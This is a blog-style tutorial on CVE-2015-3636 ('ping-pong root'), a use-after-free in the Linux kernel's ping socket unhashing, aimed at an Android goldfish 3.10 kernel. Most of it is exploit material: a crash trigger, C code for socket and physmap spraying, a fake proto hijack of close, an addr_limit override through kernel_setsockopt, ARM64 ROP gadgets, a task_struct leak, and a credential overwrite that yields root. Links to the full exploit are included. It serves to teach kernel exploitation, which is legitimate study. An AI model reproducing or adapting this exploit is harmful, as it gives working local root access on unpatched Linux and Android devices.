Let’s play ping-pong in the Linux kernel

Before Anything

CVE-2015-3636, or ping-pong root, is an infamous Use After Free vulnerability disclosed by the Keen team. For its influence and the potential damage could have borrowed to all the Linux-core based devices, for example, android mobiles, it was honored with the Best Privilege Escalation Bug in the Pwnie 2015 1.

Cool enough, but 2015 seems too far away from nowadays, in order to analyze this amazing vulnerability, I choose the android goldfish Linux 3.10.0 kernel as the research target. You can surfing through this link 2 to read the source code.

In the following content, I will introduce the detail of this bug, as well as trigger it to cause the crash of the Linux kernel, last but not least, I will try to together with you guys and write an exploit from scratch (also tells stories about failures for sure).

Pre-knowledge

Before introducing the bug, I think it will be satisfactory of telling some interesting pre-knowledge of the Linux network internal.

When you want to create a network socket, the system call is described below:

#include <sys/types.h>          /* See NOTES */
#include <sys/socket.h>

int socket(int domain, int type, int protocol);

The domain arguments specify a communication domain, for the IPv4 Internet protocol family we are interested in, the AF_INET macro will take the credit. The type argument is always candidate from [SOCK_STREAM, SOCK_DGRAM, SOCK_RAW, ...], representing the byte-stream connection, datagram connection, raw network access, so on and so forth. To be specific, the choice of domain will affect the valid choices of the type and protocol. For instance, when adopting the AF_INET domain as the first argument, the protocol argument can only be picked from IPPROTO_TCP, IPPROTO_UDP, IPPROTO_ICMP as well as IPPROTO_IP.

int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_TCP);

In addition, how the system call handle this? The SYS_socket() entry point will call sock_create() function, which followed with __sock_create() function. In the __sock_create(), the kernel will choose the protocol handler based on the arguement and call corresponded create function, like below.

	pf = rcu_dereference(net_families[family]);
    /* ... */
    err = pf->create(net, sock, protocol, kern);

For AF_INET protocol family, the inet_create() function then take over and go further by picking the specific protocol, tcp_prot in this case.

There are lines of code that is pretty juicy inside the inet_create.

    /* Add to protocol hash chains. */
    sk->sk_prot->hash(sk);

What is protocol hash chains? To my best knowledge, the functional struct sock will be inserted into the hash table to speed up the find of the right socket when receiving related packets. Anyway, hash stands for quickness and optimization, the socket is somewhat hashed will also lead to unhash operation when the socket is destroyed (Eash prot struct has its own unhash function pointer).

However, optimization sometimes brings danger. :(

The Bug itself

The real amazing bug in the wild internal just make me feel like an idiot. –my captain of the CTF team

The errorneous code was found in function ping_unhash() of file net/ipv4/ping.c.

void ping_unhash(struct sock *sk)
{
	struct inet_sock *isk = inet_sk(sk);
	pr_debug("ping_unhash(isk=%p,isk->num=%u)\n", isk, isk->inet_num);
	if (sk_hashed(sk)) {
		write_lock_bh(&ping_table.lock);
		hlist_nulls_del(&sk->sk_nulls_node);
		sock_put(sk);
		isk->inet_num = 0;
		isk->inet_sport = 0;
		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
		write_unlock_bh(&ping_table.lock);
	}
}

Of course, we can tell the exact code from this highly function-oriented programming stuffs, let me show you more details.

// include/net/sock.h
static inline bool sk_unhashed(const struct sock *sk)
{
	return hlist_unhashed(&sk->sk_node);
}

static inline bool sk_hashed(const struct sock *sk)
{
	return !sk_unhashed(sk);
}

/* ...some far place in include/linux/list.h... */

static inline int hlist_unhashed(const struct hlist_node *h)
{
	return !h->pprev;
}

And this one.

// include/linux/list_nulls.h
static inline void hlist_nulls_del(struct hlist_nulls_node *n)
{
	__hlist_nulls_del(n);
	n->pprev = LIST_POISON2;
}

The last and spicy one.

// include/net/sock.h
struct sock {
    struct sock_common __sk_common;
#define sk_node         __sk_common.skc_node
#define sk_nulls_node   __sk_common.skc_nulls_node
/* ...... */
};

// include/net/sock.h
struct sock_common {
/* ... */
	union {
		struct hlist_node	skc_node;
		struct hlist_nulls_node skc_nulls_node;
	};
/* ... */  
};

Okay then, read the above code snippets, can you find the interesting bug here?

–A split line–

Whether or not, I will talk about it. When the ping_unhash() function is called, it will check that if this sock has been hashed before, using sk_hashed() macro. The internal code shows us it just check if the pprev of this node equals to NULL (that is a null hash list for sure). After that, it will then enter into the following code block and do the unhash job, like delete the node from the hash list by calling hlist_nulls_del().

Sounds pretty legitimate, however, after the hlist_nulls_del() remove the node, it assigns LIST_POISON2 to the pprev of that node instead of NULL, which means another time when ping_unhash() is called, the unhash job will be handled again.

And that is not what we expect, not at all.

Triggering

Now we are aimed to trigger this unexpected double unhashing. To save your time, I will directly (shamelessly) use the open-source trigger script and analyze it afterward.

// trigger.c
int main(int argc, char* argv[])
{
	int sock, ret;
	sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);

	struct sockaddr_in sa;
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
	ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));

	sa.sin_family = AF_UNSPEC;
	ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
	ret = connect(sock, (const struct sockaddr *) &sa, sizeof(sa));
	return 0;
}

After you compile this code and run it on the vulnerable machine, supported by QEMU. It will stably crash your kernel as below.

$ (before you need to adb push the binary and adb shell to that emulator)
$ ./trigger
Unable to handle kernel paging request at virtual address 00200200
pgd = ffffffc03db3b000
[00200200] *pgd=000000007db3e003, *pmd=0000000000000000
Internal error: Oops: 94000046 [#1] SMP
Modules linked in:
CPU: 0 PID: 898 Comm: poc Not tainted 3.10.0+ #1
task: ffffffc03eddd100 ti: ffffffc03db44000 task.ti: ffffffc03db44000
PC is at ping_unhash+0x30/0xa4
LR is at ping_unhash+0x28/0xa4
pc : [<ffffffc0003c4d8c>] lr : [<ffffffc0003c4d84>] pstate: 80000145
sp : ffffffc03db47da0
x29: ffffffc03db47da0 x28: ffffffc03db44000
x27: ffffffc0005dc000 x26: 00000000000000cb
x25: 0000000000000116 x24: 0000000000000015
x23: 0000000000000000 x22: 0000007fef136f6c
x21: 0000000000000010 x20: ffffffc00045a000
x19: ffffffc03db32300 x18: 0000007faa0ce000
x17: 0000007fef1366b0 x16: ffffffc000346e8c
x15: 000000000047c927 x14: 000000000047c903
x13: 0000000000000000 x12: 000000000047c8df
x11: 00000000ffffffff x10: 00000000ffffffff
x9 : 0000000000000000 x8 : 00000000000000cb
x7 : 7f7f7f7f7f7f7f7f x6 : 0000000000000000
x5 : 0000000000000001 x4 : ffffffc0003bb928
x3 : 0000000000000002 x2 : 0000000000000000
x1 : 0000000000200200 x0 : 0000000000000003
......
Call trace:
[<ffffffc0003c4d8c>] ping_unhash+0x30/0xa4
[<ffffffc0003af350>] udp_disconnect+0x84/0xe4
[<ffffffc0003bb9d8>] inet_dgram_connect+0xb0/0xdc
[<ffffffc000346f04>] SyS_connect+0x78/0xcc
Code: 91080000 940247d4 f9401e61 f9401a60 (f9000020)
---[ end trace 937e3c3edcc9779b ]---
Kernel panic - not syncing: Fatal exception in interrupt

In addition, if you get an error like Permission denied when creating the socket, you have to fix the capacity issue. I just use the command sysctl -w net.ipv4.ping_group_range="0 2147483647" to enable the ICMP socket construction through system call.

Well done, let’s analyze how the trigger works.

It first creates an AF_INET socket with SOCK_DGRAM and IPPROTO_ICMP arguments. That is sensible as we are going to hack the ping protocol, which is part of the ICMP protocols. About why SOCK_DGRAM is picked, let’s go further.

The code then calls connect(sock, (const struct sockaddr *) &sa, sizeof(sa));, using AF_INET as sa.sin_family. We just dig deeper to see what will happen.

Then entrance of connect system call is SyS_connect, defined in net/socket.c as below.

SYSCALL_DEFINE3(connect, int, fd, struct sockaddr __user *, uservaddr,
		int, addrlen)
{
	struct socket *sock;
	struct sockaddr_storage address;
	int err, fput_needed;

	sock = sockfd_lookup_light(fd, &err, &fput_needed);
	if (!sock)
		goto out;
	err = move_addr_to_kernel(uservaddr, addrlen, &address);
	if (err < 0)
		goto out_put;

	err =
	    security_socket_connect(sock, (struct sockaddr *)&address, addrlen);
	if (err)
		goto out_put;

	err = sock->ops->connect(sock, (struct sockaddr *)&address, addrlen,
				 sock->file->f_flags);
out_put:
	fput_light(sock->file, fput_needed);
out:
	return err;
}

It will fetch the actual sock struct using the user applied fd, then it will map the address, do security checking, and comes to the custom connect of socket specific operations. In this case, it will jump to inet_dgram_connect() as the socket is created with SOCK_DGRAM flag and leads to an inet_dgram_ops operation struct.

int inet_dgram_connect(struct socket *sock, struct sockaddr *uaddr,
		       int addr_len, int flags)
{
	struct sock *sk = sock->sk;

	if (addr_len < sizeof(uaddr->sa_family))
		return -EINVAL;
	if (uaddr->sa_family == AF_UNSPEC)
		return sk->sk_prot->disconnect(sk, flags);

	if (!inet_sk(sk)->inet_num && inet_autobind(sk))
		return -EAGAIN;
	return sk->sk_prot->connect(sk, uaddr, addr_len);

As this connect is called with AF_INET family argument, it will pass the first two checking and enter into inet_autobind() functions. What’s more, that function will further call socket specific get_port methods.

static int inet_autobind(struct sock *sk)
{
/* ... */
		if (sk->sk_prot->get_port(sk, 0)) {
			release_sock(sk);
			return -EAGAIN;
		}
/* ... */

In this case, that will result in the calling of ping_get_port function. In this one, the kernel will hash the socket into hash ping_hashslot for accelerating. (What is weird is that the ping_hash is just an empty function…)

int ping_get_port(struct sock *sk, unsigned short ident)
{
/* ... */
	if (sk_unhashed(sk)) {
		pr_debug("was not hashed\n");
		sock_hold(sk);
		hlist_nulls_add_head(&sk->sk_nulls_node, hlist);
		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
	}
/* ... */	
}

Any familiarity? This is so symmetrical to the ping_unhash function. In fact, this is how a ping socket is being hashed. And that is the purpose of the current connect system call.

So, what about another two connect, they are designed to call into ping_unhash() function twice. See the code snippet of inet_dgram_connect() above. You can find that when AF_UNSPEC value is applied, the connect goes died and falls into disconnect method, which is udp_disconnect() here. In that function, if this socket has not been bind to a specific socket, it will call unhash method, which is our target vulnerable ping_unhash function.

That is, we can go into ping_unhash twice and trigger the bug. But wait a moment, what about the crash?

BUG: unable to handle kernel paging request at 00200200

Disassemble the vmlinux and locate the precise position, we can find that the BUG is happening here.

// static inline void __hlist_nulls_del(struct hlist_nulls_node *n)
	*pprev = next;

Because n->pprev is already changed to LIST_POISON2 in the first connect with AF_UNSPEC. This time when dereferencing pprev, it will points to an unmapped address, thus cause the kernel panic.

Exploiting

We now have a point dereference in user-level address space, which is rather limited for constructing a useful primitive. To avoid the kernel just crash here and go further for another vulnerable point, the hacker can call the mmap system call to map this address. Thankfully, after the hlist_nulls_del() is finished, the sock_put() function can be used to bring a Use After Free of the sock object.

/* Ungrab socket and destroy it, if it was the last reference. */
static inline void sock_put(struct sock *sk)
{
	if (atomic_dec_and_test(&sk->sk_refcnt)) // <- dec twice and free
		sk_free(sk);
}

No RCU, no strict checking, what a strong and stable Use After Free trigger…

With the Use After Free in hand, the next step is to raise a malicious Use After Free.

Allocating and Releasing

To do that, we first find the place where the sock is allocated. When the socket system call is used, the following inet_create() function will call sk_alloc() function that is defined in net/core/sock.c.

static struct sock *sk_prot_alloc(struct proto *prot, gfp_t priority,
		int family)
{
	struct sock *sk;
	struct kmem_cache *slab;

	slab = prot->slab;
	if (slab != NULL) {
		sk = kmem_cache_alloc(slab, priority & ~__GFP_ZERO);
		if (!sk)
			return sk;
		if (priority & __GFP_ZERO) {
			if (prot->clear_sk)
				prot->clear_sk(sk, prot->obj_size);
			else
				sk_prot_clear_nulls(sk, prot->obj_size);
		}
	} else
		sk = kmalloc(prot->obj_size, priority);
/* ... */

In this function, the sock will be allocated by kmem_cache_alloc if the slab member is not empty, otherwise kmalloc is adopted.

For this case, the core inet_init() function calls proto_register() with ping_prot argument and true flag of alloc_slab. Thus, a kmem_cache object is going to be created using PING as its name.

prot->slab = kmem_cache_create(prot->name, prot->obj_size, 0,
		SLAB_HWCACHE_ALIGN | prot->slab_flags,
		NULL);
// Through debugging, the prot->name = "PING", prot->objsize = 0x270, 
// align = 0, flags = 0x2000 (should be just SLAB_HWCACHE_ALIGN)
// In addition, per PING slub will have 2 pages and max 16 objects

Symmetrically, the corresponded release of the object is done in sk_prot_free() function.

static void sk_prot_free(struct proto *prot, struct sock *sk)
{
	struct kmem_cache *slab;
	struct module *owner;

	owner = prot->owner;
	slab = prot->slab;

	security_sk_free(sk);
	if (slab != NULL)
		kmem_cache_free(slab, sk);
	else
		kfree(sk);
	module_put(owner);
}

UAF primitive

For now, we understand the details about the allocation and release of the object. After successfully triggering two times of ping_unhash() and the sock_put() of an in-use file socket descriptor, obtaining a malicious primitive is our next target. Observing the content of struct sock, a lot of pointers can be hunted.

A direct idea for exploiting is to fake and fill the skc_prot element in __sk_common with a user control object, and points the close method of this structure to the backdoor function afterward. Thus, when the user calls the close of this socket, the malicious code will be executed.

In order to do that, a clever spraying solution shall be taken. In the traditional method, fetching the already freed object can be achieved with add_key, send_msg, and setxattr. However, the ping sock object is allocated from the PING kmem_cache, which brings high limitation.

For example, you can create another PING socket to fetch the freed ping sock object but cannot fill what you want because the initialization of that sock is done by the initializing handler.

To overcome the constraint, the author tries another crazy idea —— phsymap spraying. That is a basic block of the new attack method named ret2dir, purposed in Usenix 2014. Although it sounds like a complicated and intricate hacking skill, its internal is just super naive. The attacker can create thousands of the ping sock objects, filling the PING kmem_cache with exceed slab pages. Then selectively release part of them to lead a page discarding. Once a slab page with vulnerable sock is discarded, it is possible to be fetched in userspace page fault handling. I won’t explain the details of that, you may refer to this blog of mine if interested.

P.S. To be honest, even though my tiny experiment about mmap and slub allocator was done in x86 environment, I failed in this case (the reason will be provided later). So to ease the burden of mine, I will pick an environment from an existing CTF problem (ensuring that I have a valid answer already ;D). The target kernel labels with version 3.10+, which shouldn’t do much difference for our exploiting. If you have an interest, try to implement this in other architecture. Last but not least, you can refer to this Github repo 3 if you want to have a quick test.

Fetch the ‘double-freed’ socket

The first step of our plan is to adopting socket spraying as well as physmap spraying to implement a UAF primitive. Let’s just convert the idea into an exploit code.

“Talk is cheap, show me the code.”, let’s just write some code snippets.

int main(int argc, char* argv[])
{
	prepare(...);	
	// We can do some preparation here, maximize the resources for example

	protection(...);	
	// Then we should do `mmap` of the poision value to avoid early crash

	spraying(...);
	// We should create vulnerable sockets as well as spraying lots of ping sock objects here

	fetching(...);
	// Then we can do lots of mmap here, trying to fetch the target page

	close(...the fetch socket...);
}

Above is just a bare metal idea, let’s achieve them step by step. Before launch the attack, some preparation has to be done.

void prepare(void)
{
	printf("[+] Start prepare...\n");
/* maximize the fd limit to enable spraying */
    struct rlimit rlim;
    int ret;

    ret = getrlimit(RLIMIT_NOFILE, &rlim);
    if (ret != 0) errhandler("[!] prepare().getrlimit-1")

    rlim.rlim_cur = rlim.rlim_max;
    setrlimit(RLIMIT_NOFILE, &rlim);

    ret = getrlimit(RLIMIT_NOFILE, &rlim);
    if (ret != 0) errhandler("[!] prepare().getrlimit-2")

	printf("[~] Done prepare!\n");
}

Here we just use setrlimit system call to maximize the socket counts that we can ask for. This can be quite essential for later heap spraying, as we have to create enough sockets to make sure the dynamic memory space can be overlapped with the physmap region.

Then we do simple protection in case our exploit crash the kernel in an early stage.

void protection(void)
{
	printf("[+] Start protection...\n");
	int i;
	void* protect = mmap(PROTECT_BASE, MAX_NULLMAP_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0);
	if(MAP_FAILED == protect) errhandler("[!] protection().mmap");

	for(i = 0; i < MAX_NULLMAP_SIZE / PAGE_SIZE; i++)
		memset((char *)protect + PAGE_SIZE * i, 0x90, PAGE_SIZE);
	printf("[~] Done protection!\n");
}

The PROTECT_BASE in our experiments should be 0x200000 as the invalid memory dereference is 0x200200. After we mmap that address space, the page fault will not be triggered (Assuming no SMAP protection).

So far so good, let’s spraying those vulernable sockets now.

void spraying(void)
{
	printf("[+] Start socket spraying...\n");
	int i, ret;
	struct sockaddr _sockaddr1 = { .sa_family = AF_INET   };
	struct sockaddr _sockaddr2 = { .sa_family = AF_UNSPEC };

	for(i = 0; i < MAX_VULTRIG_SOCKS_COUNT; i++)
	{
		vultrig_socks[i] = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
		if(vultrig_socks[i] < 0) errhandler("[!] spraying().socket-create vultrig sockets");

		ret = connect(vultrig_socks[i], &_sockaddr1, sizeof(_sockaddr1));
		if(ret < 0) errhandler("[!] spraying().connect-hashing the socket");
	}

	for(i = 0; i < MAX_VULTRIG_SOCKS_COUNT; i++)
	{
		ret = connect(vultrig_socks[i], &_sockaddr2, sizeof(_sockaddr2));
		if(ret < 0) errhandler("[!] spraying().connect-free once");

		ret = connect(vultrig_socks[i], &_sockaddr2, sizeof(_sockaddr2));
		if(ret < 0) errhandler("[!] spraying().connect-free twice");
	}

	printf("[~] Done socket spraying!\n");

	printf("[+] Start physmap spraying...\n");
  	memset(physmap_spray_pages,    0,   sizeof(physmap_spray_pages));
	memset(physmap_spray_children, 0, 	sizeof(physmap_spray_children));
  	physmap_spray_pages_count   =  0;
	for(i = 0; i < MAX_PHYSMAP_SPRAY_PROCESS; i++)
	{
		int j;
		void* mapped;
  		void* mapped_page;
		mapped = mmap(NULL, MAX_PHYSMAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);
		if (mapped == MAP_FAILED) errhandler("[!] spraying().mmap");
		for(j = 0; j < MAX_PHYSMAP_SIZE / PAGE_SIZE; j++)
  		{
      		memset((void *)((char *)mapped + PAGE_SIZE * j), 0x41, PAGE_SIZE);  
      		mapped_page = (void *)((char *)mapped + PAGE_SIZE * j);
      		*(unsigned long *)((char *)mapped_page + 0x1D8)  = MAGIC_VALUE + physmap_spray_pages_count;
      		// special magic for quick identify
			physmap_spray_pages[physmap_spray_pages_count]  =  mapped_page;
			physmap_spray_pages_count++;
  		}
	}
	printf("[~] Done physmap spraying!\n");
}

Those parameters for spraying can be trivial, so I just copy from the workable exploit, and fortunately, it works. In this function, we create MAX_VULTRIG_SOCKS_COUNT sockets, do what we did in the POC code (hashing the socket, then try to release them). After that, we have plenty of released struct sock in hand.

So we start physmap spraying, hope through large mmap space we can fetch one of those released sock. To test that, we can adopt the ioctl + SIOCGSTAMPNS skill, which will retrieve a specific field in the wanted socket struct. That is to say, if we fill that field with some identifiable magic value, we can use this ioctl to verify whether or not the parameter is a vulnerable socket. The code is shown below.

void fetching(void)
{
	printf("[+] Start fetching the UAF socket...\n");
    struct timespec time;
    uint64_t value;
    void* page = NULL;
    int j = 0;
    int got = 0;
	int index = MAX_VULTRIG_SOCKS_COUNT / 2;
    do
    {
        exp_sock = vultrig_socks[index];
        memset(&time, 0, sizeof(time));
        ioctl(exp_sock, SIOCGSTAMPNS, &time);

        value = ((uint64_t)time.tv_sec * NSEC_PER_SEC) + time.tv_nsec;
        for(j = 0;  j < physmap_spray_pages_count; j++)
        {
            page = physmap_spray_pages[j];
            if(value == *(unsigned long *)((char *)page + 0x1D8)) 	// value equals to what we filled
            {
                printf("[*] obtained magic:%p\n", value);
                got      = 1;
                payload = page;	// The vulnerable socket is located in this page
                break;
            }
        }
        index += 1;
    }
    while(!got && index < MAX_VULTRIG_SOCKS_COUNT);

    if(got == 0) errhandler("[!] fetching() fail...");

	printf("[~] Done fetching the UAF socket!\n");
}

Till now, we can check if or not the UAF is succeed? (The entire code can be downloaded here: https://gist.github.com/f0rm2l1n/31ab1d42e0e18f94a5ce928816a5f65c)

# user screen
$ # also need adb push the code 
$ ./exp1
[+] Start prepare...
[~] Done prepare!
[+] Start protection...
[~] Done protection!
[+] Start socket spraying...
[~] Done socket spraying!
[+] Start physmap spraying...
[~] Done physmap spraying!
[+] Start fetching the UAF socket...
[*] obtained magic:0x4b625e33
[~] Done fetching the UAF socket!


# kernel dmesg
.......
IPv4: Attempt to release alive inet socket ffffffc032400000
IPv4: Attempt to release alive inet socket ffffffc032400300
IPv4: Attempt to release alive inet socket ffffffc032400600
IPv4: Attempt to release alive inet socket ffffffc032400900
IPv4: Attempt to release alive inet socket ffffffc032400c00
IPv4: Attempt to release alive inet socket ffffffc032400f00
IPv4: Attempt to release alive inet socket ffffffc032401200
IPv4: Attempt to release alive inet socket ffffffc032401500
IPv4: Attempt to release alive inet socket ffffffc032401800
IPv4: Attempt to release alive inet socket ffffffc032401b00
IPv4: Attempt to release alive inet socket ffffffc032402000
IPv4: Attempt to release alive inet socket ffffffc032402300
IPv4: Attempt to release alive inet socket ffffffc032402600
IPv4: Attempt to release alive inet socket ffffffc032402900
IPv4: Attempt to release alive inet socket ffffffc032402c00
IPv4: Attempt to release alive inet socket ffffffc032402f00
IPv4: Attempt to release alive inet socket ffffffc032403200
IPv4: Attempt to release alive inet socket ffffffc032403500
IPv4: Attempt to release alive inet socket ffffffc032403800
IPv4: Attempt to release alive inet socket ffffffc032403b00
IPv4: Attempt to release alive inet socket ffffffc032404000
Unable to handle kernel paging request at virtual address 4141414141414141
pgd = ffffffc03dbcb000
[4141414141414141] *pgd=0000000000000000
Internal error: Oops: 94000005 [#1] SMP
Modules linked in:
CPU: 0 PID: 945 Comm: exp1 Not tainted 3.10.0+ #1
task: ffffffc03ed32d00 ti: ffffffc03dbd4000 task.ti: ffffffc03dbd4000
PC is at ip_mc_drop_socket+0x34/0xa8
LR is at ip_mc_drop_socket+0x24/0xa8
pc : [<ffffffc0003bdc0c>] lr : [<ffffffc0003bdbfc>] pstate: 60000145
sp : ffffffc03dbd7d90
x29: ffffffc03dbd7d90 x28: ffffffc03dbd4000
x27: ffffffc0005dc000 x26: 0000000000000039
x25: ffffffc03daf7710 x24: ffffffc030c31430
x23: ffffffc00045a000 x22: ffffffc031620000
x21: ffffffc03ebf8180 x20: ffffffc0316200e8
x19: 4141414141414141 x18: 0000007f94698000
x17: 0000000000000000 x16: ffffffc000141878
x15: 00000000004a7d04 x14: 0000000000000010
x13: 0a2174656b636f73 x12: 2046415520656874
x11: 0000000000000000 x10: 0000007f93817108
x9 : 6d313e33a48870ce x8 : 0000000000000039
x7 : ffffffc000617038 x6 : 0000000000000000
x5 : 0000000000000000 x4 : 0000000000000000
x3 : 0000000041414141 x2 : 0000000000000000
x1 : 0000000000000000 x0 : ffffffc03ed32d00
...
Call trace:
[<ffffffc0003bdc0c>] ip_mc_drop_socket+0x34/0xa8
[<ffffffc0003b9fd0>] inet_release+0x48/0x94
[<ffffffc000344d58>] sock_release+0x20/0x9c
[<ffffffc000344de0>] sock_close+0xc/0x1c
[<ffffffc0001439bc>] __fput+0x98/0x23c
[<ffffffc000143c20>] ____fput+0x8/0x14
[<ffffffc0000b5048>] task_work_run+0x94/0xec
[<ffffffc000088070>] do_notify_resume+0x50/0x64
Code: 9103a2d4 b00004f7 f94146d3 b4000313 (f9400260)

The fact is that the UAF is not one hurdred percent stable. So run again if not satisfy the expectation.

Cool! The kernel is crashed because of page fault at 0x4141414141414141, which is quite obvious what we filled in our mmap spraying.

	memset((void *)((char *)mapped + PAGE_SIZE * j), 0x41, PAGE_SIZE); 

We can look into the source code to understand this panic, is about function void ip_mc_drop_socket(struct sock *sk), which is called by inet_realease().

{
	struct inet_sock *inet = inet_sk(sk); 
	struct ip_mc_socklist *iml;
	struct net *net = sock_net(sk);

	if (inet->mc_list == NULL)
		return;
	/* .... */
}

This function first obtain variable inet from sock, which is filled with 0x41 bytes. Then it tries to retrive the mc_list field in inet, results in the invalid dereference at 0x4141414141414141. To avoid that, we can place NULL variable at this field.

PC hijacking

As we already have controllable UAF primitive, it’s time to seek a useful code or data pointer to achieve further exploiting. As we already discussed, hijacking the skc_proto field of __sk_common in the struct sock is an applicable way, as inet_release() function will adopt related indirect call.

int inet_release(struct socket *sock)
{
	struct sock *sk = sock->sk;

	if (sk) {
		/* ... */
		sk->sk_prot->close(sk, timeout);	// very juicy
	}
	return 0;
}

You can refer to here for the detail of proto. The related code is like below.

	struct proto* fakeproto = malloc(sizeof(struct proto));
	fakeproto->close = /* what we want to go */;
	*(unsigned long *)((char* )payload + 40)  = fakeproto;

Privilege Escalation

So what we should do next seems quite clear, can we write a user-mode backdoor and directly call commit_creds() as usual? Unfortunately, the answer is no and it really hits me after testing. The kernel shows error message like below

Bad mode in Synchronous Abort handler detected, code 0x8400000f
CPU: 0 PID: 914 Comm: exp2 Not tainted 3.10.0+ #1
task: ffffffc03ecd5100 ti: ffffffc03db60000 task.ti: ffffffc03db60000
PC is at 0x400c30
LR is at inet_release+0x84/0x94

Well? What happens? After googling around, I found that the ARM architecture has its own security property inside its page table, which x86 has none. You can look up the manual or this description for detail. In a nutshell, the ARM architecture has accurate Access Permissions for different memory locations, enabling separation between EL0 (Unprivileged) and other privileged modes. Thus, directly return to the user malicious code can not take effect here.

Fine, time to learn and try something new this time. As we cannot execute the code we write, we can adopt the kernel ROP technique to do tricky hacking.

For a newbie like me, it’s quite hard to do it all by myself (construct an ROP chain, bypassing PXN, leaking task_struct…). Thus, I just want to understand and modify others’ code for successful exploitation. Because CVE-2015-3636 is a famous and old bug, you can find many resources to do this.

We simply plagiarize others’ code like below.

Hijacking addr_limit

The trick here was purposed in 2016, through function int kernel_setsockopt().

int kernel_setsockopt(struct socket *sock, int level, int optname,
			char *optval, unsigned int optlen)
{
	mm_segment_t oldfs = get_fs();
	char __user *uoptval;
	int err;

	uoptval = (char __user __force *) optval;

	set_fs(KERNEL_DS);
	if (level == SOL_SOCKET)
		err = sock_setsockopt(sock, level, optname, uoptval, optlen);
	else
		err = sock->ops->setsockopt(sock, level, optname, uoptval,
					    optlen);
	set_fs(oldfs);
	return err;
}

In this function, the kernel will first save current mm_segment_t to oldfs, update to KERNEL_DS, which is 0xffffffffffffffff here, enabling current thread the ability to read&write kernel space memory. After the sock_setsockopt is finished, oldfs will be restored. As we can hijack the pc to construct ROP chain, we can

  1. redirect sk->sk_prot->close(sk, timeout); to kernel_setsockopt.
  2. construct fake ops in sock to let sock->ops->setsockopt call to other place to escape the set_fs(oldfs);.

When it comes to detail, I pick some assemble code below as well as some value learnt from debugging.

kernel_setsockopt
.text:FFFFFFC0003443CC                 STP             X29, X30, [SP,#-0x20+var_s0]!
.text:FFFFFFC0003443D0                 CMP             W1, #1
.text:FFFFFFC0003443D4                 MOV             X5, SP
.text:FFFFFFC0003443D8                 MOV             X29, SP
.text:FFFFFFC0003443DC                 STP             X19, X20, [SP,#var_s10]
.text:FFFFFFC0003443E0                 AND             X19, X5, #0xFFFFFFFFFFFFC000
.text:FFFFFFC0003443E4                 MOV             X5, #0xFFFFFFFFFFFFFFFF
.text:FFFFFFC0003443E8                 LDR             X20, [X19,#8]
.text:FFFFFFC0003443EC                 STR             X5, [X19,#8]
.text:FFFFFFC0003443F0                 B.EQ            loc_FFFFFFC000344410
.text:FFFFFFC0003443F4                 LDR             X5, [sock,#0x28]
.text:FFFFFFC0003443F8                 LDR             X5, [X5,#0x68]
.text:FFFFFFC0003443FC                 BLR             X5 		# break points here
.text:FFFFFFC000344400                 STR             oldfs, [X19,#8]
.text:FFFFFFC000344404                 LDP             X19, oldfs, [SP,#var_s10]
.text:FFFFFFC000344408                 LDP             X29, X30, [SP+var_s0],#0x20
.text:FFFFFFC00034440C                 RET

When the rop chain is executed at 0xFFFFFFC0003443FC, the X20 register keeps the oldfs variable, whose value is 0x8000000000. At this place, [SP] and [SP+0x8] stores old value of X19 and X20. We don’t have to know these details, compiler just save them for principle.

The called routine is expected to preserve r19-r28. link

By doing this, the control-flow bypass code at 0xFFFFFFC000344400 and do no side effect. (remember that in RISC architecture, the return address won’t automatically save into stack!)

In all, after the addr_limit is malicious enlarged, we obtain an arbitary read & write primitive through pipe read & write. (now we just remember this, a post discussing about pipe will be released in near future ;D)

Enable mmap NULL address

To enable mmap at NULL address will do help to subsequent missions (leaking task_struct). To do so, we can just utilize the aribitary write primitive to write the variable mmap_min_addr in kernel data section.

Leaking task_struct

Cool, as we can write to any place we want and we can (to some extent) hijack the control-flow when close a vulnerable socket. The direct idea to get a privilege escalation is to write real_cred struct for current task_struct. Once we leak the address of this target, we can easily modify the value of it.

How to do that?

An interesting finding when we achieve the arbitrary read&write primitive can be discussed now. Let’s look into set_fs and get_fs.

#define get_fs()	(current_thread_info()->addr_limit)

static inline void set_fs(mm_segment_t fs)
{
	current_thread_info()->addr_limit = fs;
}

We see that both get_fs and set_fs contact with current_thread_info. How do them achieve this in code?

static inline struct thread_info *current_thread_info(void)
{
	register unsigned long sp asm ("sp");
	return (struct thread_info *)(sp & ~(THREAD_SIZE - 1));
}

Isn’t that amazing? To obtain the current thread_info, what you should do is to xor current stack pointer with 0xFFFFFFFFFFFFC000. How beautiful the alignment is! Why can this weird function extract the thread_info should be answered by the kernel stack design. In Aarch64, the kernel stack for each thread is 16kb, and corresponded thread_info is just located at the start position. Hence, you know why this trick takes effects.

What we do next is to find a proper gadget to get the address of thread_info, and further get the address of task_struct. Exising solutions utilize gadget in mutex_trylock().

.text:FFFFFFC00045457C                 MOV             X2, SP
.text:FFFFFFC000454580                 AND             X2, X2, #0xFFFFFFFFFFFFC000
.text:FFFFFFC000454584                 LDR             X2, [X2,#0x10]
.text:FFFFFFC000454588                 STR             X2, [X1,#0x18]
.text:FFFFFFC00045458C                 RET

With the help of this gadget, the value of thread_info+0x10, which is the struct task_struct *task will be stored into address X1 + 0x18. Back to the PC hijack position in inet_release(). X1 represents the variable timeout, whose value is 0 in our experiement. That is to say, the address of current task_struct is stored at virtual address 0x0 + 0x18. (Now you understand why we need to enable mmap NULL address).

The remain part is quite clear: with real_cred offset in hand, we can rewrite uid, gid, suid … to zero… In addition, some solutions will clean out task_struct->files->fdt to avoid early crash (because there are large number of UAF socket still there).

The entire code for you can be found here.

The image of exploit can be viewed below.

pingpongroot.png

The old CVE-2015-3636 is quite an attractive one. Playing with this can help you learn knowledge of the basics of advanced kernel exploitation. It can also open the door os Android hacking for you. Through this blog, hope you understand the internal of this bug and the solution to hijacking.

